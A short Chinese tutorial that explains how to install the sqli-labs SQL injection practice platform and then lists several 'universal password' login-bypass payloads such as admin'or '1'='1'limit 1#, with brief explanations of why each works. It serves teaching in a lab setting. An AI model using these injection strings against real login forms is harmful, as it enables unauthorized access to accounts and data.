安装sqli-labs及万能密码分析

sqli-labs是一个用来学习sql注入的平台，话不多说开始安装

下载地址：https://github.com/Audi-1/sqli-labs

1.将文件解压到phpstudy的www目录下，打开sql-connections目录下的db-creds.inc文件，改成自己的数据库信息

2.打开网页localhost/sqli-labs-master，点击Setup/reset Database for labs

3.安装成功，返回首页，即可做题

扩展：万能密码

前提1：在该登录框存在sql注入且知道其闭合字符和用户名时，可以用到的几种万能密码如下：

• admin'and ''=''#
  分析：and前后条件都为真且后面的语句已被注释掉
• admin'or '1'='1'limit 1#
  分析：or前后条件都为真，此时将会得到所有的用户信息，所以用到limit限制只得到一条用户信息
• admin'or'
  分析：or前后只要用户名正确即可，同时因为and优先级高于or，因此无需注释掉后面的and均可判断为真

前提2：在不知道用户名的情况下的万能密码

• 'or '1'='1'limit 1#
  分析：同样只要or后条件为真即为真，使用limit获取一条用户信息